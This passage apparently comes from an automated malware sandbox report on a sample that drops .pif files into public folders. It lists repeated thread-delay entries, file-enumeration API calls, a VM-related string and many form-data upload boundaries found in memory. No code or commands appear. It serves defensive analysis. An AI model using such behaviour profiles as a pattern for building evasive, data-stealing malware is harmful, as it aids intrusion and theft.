            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -596875s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -596765s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -596656s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -596546s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -596437s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -596328s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -596218s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -596109s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -595999s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -595890s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -595780s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -595671s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -595562s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -595453s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -595343s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -595234s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -595125s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -595015s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -594906s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -594796s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -594686s >= -30000s
            Source: C:\Users\Public\Libraries\yihfsboC.pif TID: 8132Thread sleep time: -594578s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\Public\xpha.pifLast function: Thread delayed
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeCode function: 0_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B15908
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,16_2_003A0207
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,16_2_003A589A
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003B3E66 FindFirstFileW,FindNextFileW,FindClose,16_2_003B3E66
            Source: C:\Users\Public\alpha.pifCode function: 16_2_003A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_003A4EC1
            Source: C:\Users\Public\alpha.pifCode function: 16_2_0039532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,16_2_0039532E
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,19_2_003A589A
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,19_2_003A0207
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003B3E66 FindFirstFileW,FindNextFileW,FindClose,19_2_003B3E66
            Source: C:\Users\Public\alpha.pifCode function: 19_2_003A4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,19_2_003A4EC1
            Source: C:\Users\Public\alpha.pifCode function: 19_2_0039532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,19_2_0039532E
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599437Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598974Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598844Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598734Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598625Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598516Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598406Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598297Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596985Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596860Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596735Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596610Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596485Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596360Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596246Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596125Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596016Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595891Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595781Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595563Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595438Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595313Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595203Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595094Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594641Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594422Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594313Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 600000
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599875
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599766
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599641
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599516
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599406
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599297
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599188
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599063
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598938
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598828
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598719
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598594
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598235
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598110
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597985
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597860
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597735
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597610
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597235
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597110
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596985
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596860
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596735
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596610
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596485
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596360
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596235
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596110
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595985
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595860
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595735
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595622
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595500
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595391
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595266
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595156
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595047
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594936
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594828
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594688
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594559
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594452
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594344
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594234
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594125
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 922337203685477
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 600000
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599874
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599756
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599625
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599515
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599406
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599296
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599187
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 599078
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598968
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598859
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598749
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598635
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598515
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598406
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598296
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598187
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 598078
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597968
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597859
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597749
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597640
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597531
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597421
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597312
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597203
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 597093
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596984
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596875
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596765
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596656
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596546
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596437
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596328
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596218
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 596109
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595999
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595890
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595780
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595671
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595562
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595453
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595343
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595234
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595125
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 595015
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594906
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594796
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594686
            Source: C:\Users\Public\Libraries\yihfsboC.pifThread delayed: delay time: 594578
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd155c28fa062f<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0dc191055343<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd101cbc07fa5f<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e867d773907<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd10f104b8c903<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1006e1e9399e<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f519f0d5ca3<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0ec9f12dbdf1<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd11c811aae335<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd10c1527eafe5<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1044355765bf<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0ec250d2c789<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f0c03271772<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1011a0457cfd<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd10354bf3d436<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e18ff2f9f9e<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f35250cf7bb<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0eb5ee92c4e0<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034A76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0dc19c90c343<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd11559464c338<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f8fc54b4863<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd11dc4fb6d2d1<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd10f381542235<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0ecccaf1fdd6<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0efa41ff69d7<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e425aa9301b<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd12d4ee8d8cfe<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0dcf5032218b<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0fd2dd57c60f<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0fab9e050937<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f28be95a5fb<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0df0efc49c34<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0ff1a9c0edb8<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f1e9f0c802f<
            Source: Cobsfhiy.PIF, 00000018.00000002.1551396300.0000000000828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f4ce99ede20<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0dc18a308c59
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0dcf44be8900<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0de86b2c0ccf<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd12345456dd07<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f1ddc04ff5a<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f6f3c5dd29e<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd114d7c71abd4<
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWNi
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0dd94d3b31f7<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1197e49d4113<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e2c53de666f<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd1423a1fed966<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f76f31b176f<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0eb3179c3f7f<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd112bbdaca27c<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e633f512fcf<
            Source: yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f4082f33a4c<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0ef55334ac8a<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e2c5dc4481c<
            Source: yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd11aa88ccb890<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd10ec2ab08ceb<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f5908777d5b<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0e6f6632ec55<
            Source: yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd0f08a8cc2626<
